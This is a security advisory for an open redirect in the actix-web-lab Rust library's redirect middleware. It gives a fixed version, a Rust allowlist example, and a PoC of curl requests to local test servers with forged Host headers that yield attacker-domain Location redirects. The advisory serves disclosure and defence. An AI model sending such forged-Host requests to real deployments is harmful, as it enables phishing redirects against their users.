CVSS 3.1 score: 5.4
actix-web-lab can redirect to attacker-specified URLs
GHSA-vhj5-x93p-67jw
Summary
actix-web-lab's redirect middleware can be tricked into sending users to any website. This can be used to phish or scam users. To mitigate, configure your deployment so that only trusted `Host` header values are accepted (host allowlisting at the proxy or application).
What to do
- Update actix-web-lab to version 0.26.0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | actix-web-lab | <= 0.25.0 | 0.26.0 |
Original title
actix-web-lab has host header poisoning in redirect middleware that can generate attacker-controlled absolute redirects
Original description
### Summary
`actix-web-lab` redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, `https://{hostname}{path}`). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the `Location` response header, causing open redirect/phishing behavior.
### CVE
Assigned CVE ID: CVE-2025-63762
### Details
The issue is in redirect middleware paths that construct absolute URLs from `req.connection_info()`:
1. `actix-web-lab/src/redirect_to_https.rs` (around lines 119-132)
- `let host = conn_info.host();`
- `format!("https://{hostname}{path}")`
- `format!("https://{hostname}:{port}{path}")`
2. `actix-web-lab/src/redirect_to_www.rs` (around lines 30-35)
- `format!("{scheme}://www.{host}{path}")`
3. `actix-web-lab/src/redirect_to_non_www.rs` (around lines 30-34)
- `format!("{scheme}://{host_no_www}{path}")`
Because host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.
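The following is an added example, not code from actix-web-lab or from the advisory author. It reproduces the three `format!` shapes listed above in a stand-alone Rust program, first as the unchecked construction the advisory describes and then behind a host allowlist check, which is the "deployment-side host validation" the advisory says is missing. The allowlist (`example.com`, `www.example.com`) and the names `HostCheck`, `RedirectKind`, `validate_host`, `unchecked_redirect` and `checked_redirect` are constructed for this example; the `Host` values come from the advisory's PoC requests.

```rust
// Added example (not actix-web-lab code): the three absolute-redirect shapes
// named in the advisory, built only after the request-supplied host has been
// checked against a deployment allowlist. All type and function names here are
// invented for this example.
use std::collections::HashSet;

/// Result of checking a `Host` header value against the allowlist.
#[derive(Debug, PartialEq)]
pub enum HostCheck {
    /// Canonical (lower-cased, port-stripped) host that is on the allowlist.
    Allowed(String),
    /// Host is not allowlisted; no absolute redirect may be built from it.
    Rejected,
}

/// Which of the advisory's three redirect middlewares is being emulated.
#[derive(Debug, Clone, Copy)]
pub enum RedirectKind {
    /// redirect_to_https: `https://{host}{path}`
    Https,
    /// redirect_to_www: `{scheme}://www.{host}{path}`
    Www,
    /// redirect_to_non_www: `{scheme}://{host_no_www}{path}`
    NonWww,
}

/// Split an optional `:port` suffix off a host value. IPv6 literals such as
/// `[::1]` are kept intact because their last `:`-segment is not all digits.
fn strip_port(raw: &str) -> &str {
    match raw.rsplit_once(':') {
        Some((host, port)) if !port.is_empty() && port.bytes().all(|b| b.is_ascii_digit()) => host,
        _ => raw,
    }
}

/// Canonicalise the request-supplied host and compare it with the allowlist.
/// Allowlist entries are lower-case host names without ports.
pub fn validate_host(raw_host: &str, allowed: &HashSet<&str>) -> HostCheck {
    let host = strip_port(raw_host.trim())
        .trim_end_matches('.')
        .to_ascii_lowercase();
    if !host.is_empty() && allowed.contains(host.as_str()) {
        HostCheck::Allowed(host)
    } else {
        HostCheck::Rejected
    }
}

/// The construction the advisory describes: the host taken from connection
/// metadata is interpolated straight into the `Location` value, unvalidated.
pub fn unchecked_redirect(kind: RedirectKind, scheme: &str, host: &str, path: &str) -> String {
    match kind {
        RedirectKind::Https => format!("https://{host}{path}"),
        RedirectKind::Www => format!("{scheme}://www.{host}{path}"),
        RedirectKind::NonWww => {
            let host_no_www = host.strip_prefix("www.").unwrap_or(host);
            format!("{scheme}://{host_no_www}{path}")
        }
    }
}

/// Hardened form: the same redirect, but only for an allowlisted host.
/// `None` lets the caller answer 400 Bad Request (or fall back to a relative
/// redirect) instead of echoing an attacker-chosen host in `Location`.
pub fn checked_redirect(
    kind: RedirectKind,
    scheme: &str,
    raw_host: &str,
    path: &str,
    allowed: &HashSet<&str>,
) -> Option<String> {
    match validate_host(raw_host, allowed) {
        HostCheck::Allowed(host) => Some(unchecked_redirect(kind, scheme, &host, path)),
        HostCheck::Rejected => None,
    }
}

fn main() {
    // Constructed allowlist for the demo deployment.
    let allowed: HashSet<&str> = HashSet::from(["example.com", "www.example.com"]);

    // Host value taken from the advisory's PoC request.
    let poisoned = "attacker.example";
    println!("unchecked: {}", unchecked_redirect(RedirectKind::Https, "http", poisoned, "/test"));
    println!("checked:   {:?}", checked_redirect(RedirectKind::Https, "http", poisoned, "/test", &allowed));
    println!("legit:     {:?}", checked_redirect(RedirectKind::Www, "https", "EXAMPLE.COM:8443", "/hello", &allowed));
}
```

The port is dropped before comparison because the advisory's own observation (`Host: evil.example:9999` producing `https://evil.example/abc/def`) shows the middleware discards it too; comparing a lower-cased, port-free, trailing-dot-free value means an allowlist of canonical names cannot be bypassed by case or by an appended `:port`. Rejecting rather than falling back to a default host keeps the failure visible in logs, which is where a sudden burst of unknown `Host` values would show up.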
### PoC
Environment used for validation:
- Local minimal Actix apps using `actix-web-lab` middleware
- RedirectHttps: `http://127.0.0.1:18080`
- redirect_to_www: `http://127.0.0.1:18081`
- redirect_to_non_www: `http://127.0.0.1:18082`
Reproduction (RedirectHttps):
```bash
curl.exe -i -s "http://127.0.0.1:18080/test" -H "Host: attacker.example"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: https://attacker.example/test
```
Additional verification:
```bash
curl.exe -i -s "http://127.0.0.1:18080/abc/def" -H "Host: evil.example:9999"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: https://evil.example/abc/def
```
Reproduction (redirect_to_www):
```bash
curl.exe -i -s "http://127.0.0.1:18081/hello" -H "Host: attacker.example"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: http://www.attacker.example/hello
```
Reproduction (redirect_to_non_www):
```bash
curl.exe -i -s "http://127.0.0.1:18082/path" -H "Host: www.attacker.example"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: http://attacker.example/path
```
### Impact
This is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.
GHSA CVSS 3.1 score: 5.4
Vulnerability type: CWE-601 (Open Redirect)
Published: 11 Mar 2026 · Updated: 13 Mar 2026 · First seen: 11 Mar 2026